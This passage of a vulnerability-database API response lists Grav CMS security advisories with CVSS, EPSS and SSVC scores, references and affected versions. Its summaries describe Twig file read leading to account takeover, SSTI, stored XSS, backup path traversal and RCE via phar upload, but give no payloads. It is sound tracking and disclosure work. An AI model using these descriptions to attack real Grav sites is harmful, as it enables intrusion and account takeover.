            ],
            "aliases": [
                "CVE-2024-28118",
                "GHSA-r6vw-8v8r-pmp4"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7jaz-7xjc-kka1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/54876?format=api",
            "vulnerability_id": "VCID-9j1y-z47y-xudz",
            "summary": "Grav Vulnerable to Arbitrary File Read to Account Takeover\nA low privilege user account with page edit privilege can read any server files using Twig Syntax. This includes Grav user account files - /grav/user/accounts/*.yaml. This file stores hashed user password, 2FA secret, and the password reset token. This can allow an adversary to compromise any registered account by resetting a password for a user to get access to the password reset token from the file or by cracking the hashed password.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-34082",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00276",
                            "scoring_system": "epss",
                            "scoring_elements": "0.51328",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-34082"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/b6bba9eb99bf8cb55b8fa8d23f18873ca594e348",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-15T19:34:23Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/b6bba9eb99bf8cb55b8fa8d23f18873ca594e348"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34082",
                    "reference_id": "CVE-2024-34082",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34082"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f8v5-jmfh-pr69",
                    "reference_id": "GHSA-f8v5-jmfh-pr69",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f8v5-jmfh-pr69"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-f8v5-jmfh-pr69",
                    "reference_id": "GHSA-f8v5-jmfh-pr69",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-15T19:34:23Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f8v5-jmfh-pr69"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/81408?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.46",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.46"
                }
            ],
            "aliases": [
                "CVE-2024-34082",
                "GHSA-f8v5-jmfh-pr69"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9j1y-z47y-xudz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49301?format=api",
            "vulnerability_id": "VCID-9tu1-4n1t-6bgv",
            "summary": "Grav is vulnerable to Server-Side Template Injection (SSTI) via Forms\nHaving a simple form on a site can reveal all of the Grav configuration details (including plugin configuration details) by using the correct POST payload. Sensitive information may be contained in the configuration details.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66298",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0007",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21559",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66298"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:06:52Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66298",
                    "reference_id": "CVE-2025-66298",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66298"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8535-hvm8-2hmv",
                    "reference_id": "GHSA-8535-hvm8-2hmv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8535-hvm8-2hmv"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-8535-hvm8-2hmv",
                    "reference_id": "GHSA-8535-hvm8-2hmv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:06:52Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-8535-hvm8-2hmv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66298",
                "GHSA-8535-hvm8-2hmv"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9tu1-4n1t-6bgv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49328?format=api",
            "vulnerability_id": "VCID-a375-aqzf-r7gw",
            "summary": "Grav CMS is vulnerable to Cross Site Scripting (XSS) in the page editor\nGrav CMS 1.7.49 is vulnerable to Cross Site Scripting (XSS). The page editor allows authenticated users to edit page content via a Markdown editor. The editor fails to properly sanitize <script> tags, allowing stored XSS payloads to execute when pages are viewed in the admin interface.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65186",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10199",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65186"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T19:31:02Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65186",
                    "reference_id": "CVE-2025-65186",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65186"
                },
                {
                    "reference_url": "https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65186.pdf",
                    "reference_id": "CVE-2025-65186.PDF",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T19:31:02Z/"
                        }
                    ],
                    "url": "https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65186.pdf"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cchq-397m-q2qm",
                    "reference_id": "GHSA-cchq-397m-q2qm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cchq-397m-q2qm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/907173?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.49.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.49.1"
                }
            ],
            "aliases": [
                "CVE-2025-65186",
                "GHSA-cchq-397m-q2qm"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a375-aqzf-r7gw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49326?format=api",
            "vulnerability_id": "VCID-a8df-4jgt-gba4",
            "summary": "Grav vulnerable to Path Traversal allowing server files backup\n```\nA path traversal vulnerability has been identified in Grav CMS, version 1.7.49.5, allowing authenticated attackers\nwith administrative privileges to read arbitrary files on the underlying server filesystem. This vulnerability arises due\nto insufficient input sanitization in the backup tool, where user-supplied paths are not properly restricted, enabling\naccess to files outside the intended webroot directory. The impact of this vulnerability depends on the privileges of\nthe user account running the application.\n```",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66302",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00064",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20209",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66302"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:11:05Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66302",
                    "reference_id": "CVE-2025-66302",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66302"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-j422-qmxp-hv94",
                    "reference_id": "GHSA-j422-qmxp-hv94",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-j422-qmxp-hv94"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-j422-qmxp-hv94",
                    "reference_id": "GHSA-j422-qmxp-hv94",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:11:05Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-j422-qmxp-hv94"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66302",
                "GHSA-j422-qmxp-hv94"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a8df-4jgt-gba4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47204?format=api",
            "vulnerability_id": "VCID-a8y8-y4zt-zqbv",
            "summary": "Remote Code Execution by uploading a phar file using frontmatter\n- Due to insufficient permission verification, a user who can write a page can use the frontmatter feature.\n- Inadequate file name validation",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27923",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.05118",
                            "scoring_system": "epss",
                            "scoring_elements": "0.90029",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27923"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-02T18:34:03Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27923",
                    "reference_id": "CVE-2024-27923",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27923"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f6g2-h7qv-3m5v",
                    "reference_id": "GHSA-f6g2-h7qv-3m5v",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f6g2-h7qv-3m5v"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v",
                    "reference_id": "GHSA-f6g2-h7qv-3m5v",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-02T18:34:03Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/69258?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.43",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ps5-3k43-p3fa"
                        },
                        {
                            "vulnerability": "VCID-4a2z-37a3-2qaw"
                        },
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-7jaz-7xjc-kka1"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-bwvg-jg4z-nyhp"
                        },
                        {
